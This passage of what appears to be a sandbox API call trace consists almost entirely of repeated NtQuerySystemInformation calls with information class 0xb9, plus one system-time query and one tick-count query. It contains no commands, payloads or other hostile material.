(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd590 | out: lpSystemTimeAsFileTime=0xc7520fd590*(dwLowDateTime=0xe8b02d6f, dwHighDateTime=0x1d5fb6e)) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0227.189] GetTickCount () returned 0x11795da [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0227.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0227.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0227.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0227.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0227.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 